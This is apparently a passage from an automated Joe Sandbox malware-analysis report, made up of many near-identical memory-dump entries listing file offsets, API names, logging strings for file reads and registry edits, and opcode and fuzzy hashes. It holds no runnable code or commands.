    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
    • Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
    • Instruction ID: 2effbb2ac9323e81c0951529680ace9405c80b9dfadc3614038775184c3fdaca
    • Opcode Fuzzy Hash: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
    • Instruction Fuzzy Hash: A1F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F5CE2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
    • Instruction ID: c2a27a62da5da4cceb82ddc2cc13f70b9069f1db666b2499920285fa7883c871
    • Opcode Fuzzy Hash: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
    • Instruction Fuzzy Hash: 63F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F68E2D2AEE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
    • Instruction ID: 2effbb2ac9323e81c0951529680ace9405c80b9dfadc3614038775184c3fdaca
    • Opcode Fuzzy Hash: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
    • Instruction Fuzzy Hash: A1F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F5CE2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
    • Instruction ID: c2a27a62da5da4cceb82ddc2cc13f70b9069f1db666b2499920285fa7883c871
    • Opcode Fuzzy Hash: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
    • Instruction Fuzzy Hash: 63F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F68E2D2AEE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
    • Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
    • Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
    • Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
    • Instruction ID: c2a27a62da5da4cceb82ddc2cc13f70b9069f1db666b2499920285fa7883c871
    • Opcode Fuzzy Hash: d5bcd52f56a6e8500c5b09500c98dadbfd880aeccdf7c7cdb7d27f3d0aab3cd4
    • Instruction Fuzzy Hash: 63F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F68E2D2AEE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: ab2b58690d4633de34a1eff2ff73d343619643ca4b4637b53fc883911d8892d2
    • Instruction ID: 002a72d36b8507c30ac2e5d891574fab2a53a54b163a1fe3fa8a5d0d17619555
    • Opcode Fuzzy Hash: ab2b58690d4633de34a1eff2ff73d343619643ca4b4637b53fc883911d8892d2
    • Instruction Fuzzy Hash: 50F0B413B0A9024DF9139A06B4017BC02411FA13B1E4D06F28E2D2AEE5AE3DA8C29304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
    • Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
    • Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
    • Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction ID: ef2086a0ea842e7a849c63a149cc6959894656122c03715d98caf78d6ceabcbf
    • Opcode Fuzzy Hash: 286e2a61be45083a5285ac4d5e5531632268184f5deb066fd690b9834a7f18a8
    • Instruction Fuzzy Hash: F4F05453B0A9034DF9539A06B4417BD12411FA17B1E4D06F58E6D2AAE5AE3DA8C79304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction ID: 05446d8a877d45bc4edebcf6191b535a621ca3402e3195da6af2609802fc5929
    • Opcode Fuzzy Hash: a94080ec0b739bcf5d64c614518483abbae9b1d91418be945d9ff20de2a86ae5
    • Instruction Fuzzy Hash: 55F0B413B0AA034DF9139A06B4017BC12411FA13B1E4D07F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction ID: 1f40665af35233cde3144858dd2ecaba3e091c57a968bb02b0dcdaac01b0ba8d
    • Opcode Fuzzy Hash: 2b1372d1e1f07fc1b4dfce10ebb9b520dec10cd7270facd4ac0b17cb662f1201
    • Instruction Fuzzy Hash: BBF0B413B0A9034DF9139A06B4017BD12421FA13B1E4D06F58E2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: fclose
    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
    • API String ID: 3125558077-1073242539
    • Opcode ID: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
    • Instruction ID: 2effbb2ac9323e81c0951529680ace9405c80b9dfadc3614038775184c3fdaca
    • Opcode Fuzzy Hash: 7b5cfa9264d3722753f48c3057c2910e47a5fc1496268bc5207db179291c80f5
    • Instruction Fuzzy Hash: A1F0B413B0A9034DF9139A06B4017BC12411FA13B1E4D06F5CE2D2AAE5AE3DA8C39304
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
    • API String ID: 1001908780-3542721600
    • Opcode ID: 13a7cb61c00d25443b3b9a661bab418efe9fb22132e9429bd1f01525c86fbb2f
    • Instruction ID: 7ec8e16228d2c9719c2f5b329cd0850853bbb01705e711ce309518e66ef9def4
    • Opcode Fuzzy Hash: 13a7cb61c00d25443b3b9a661bab418efe9fb22132e9429bd1f01525c86fbb2f
    • Instruction Fuzzy Hash: 36E01252A1CE4A89F551AB02FC1007D2250EB607A5F4052F5ED6F67AB0DE2CE5CAD309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
    • API String ID: 1001908780-3542721600
    • Opcode ID: 2abf9f985886171be785bc874de6f574e45e6e99241a3bc1d998fa1d3d941a66
    • Instruction ID: 603236f25351b3cced0d9fe4d7c046d50a9b2412e69715b755397cb22f304d6a
    • Opcode Fuzzy Hash: 2abf9f985886171be785bc874de6f574e45e6e99241a3bc1d998fa1d3d941a66
    • Instruction Fuzzy Hash: 62E01252A1DE4A89F511AB02FC1007D2254EB607A5F4002F6ED6F67AB0DE2CE5C6D309
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
    • API String ID: 1001908780-1337547089
    • Opcode ID: a9753b631b1e23125cccc6be91f6982892053f68cc0d1430d7c464c6d8d017b2
    • Instruction ID: 53553c8a0640ff940367745ead7a432a1f709a7f5f7a503145c55b99b198ff32
    • Opcode Fuzzy Hash: a9753b631b1e23125cccc6be91f6982892053f68cc0d1430d7c464c6d8d017b2
    • Instruction Fuzzy Hash: 42E01251A0CE4A8DF5109B06FC101792255FF617A8F5002B5E96E66A719D2CD5C69308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Closefflushfwrite
    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
    • API String ID: 1001908780-1337547089
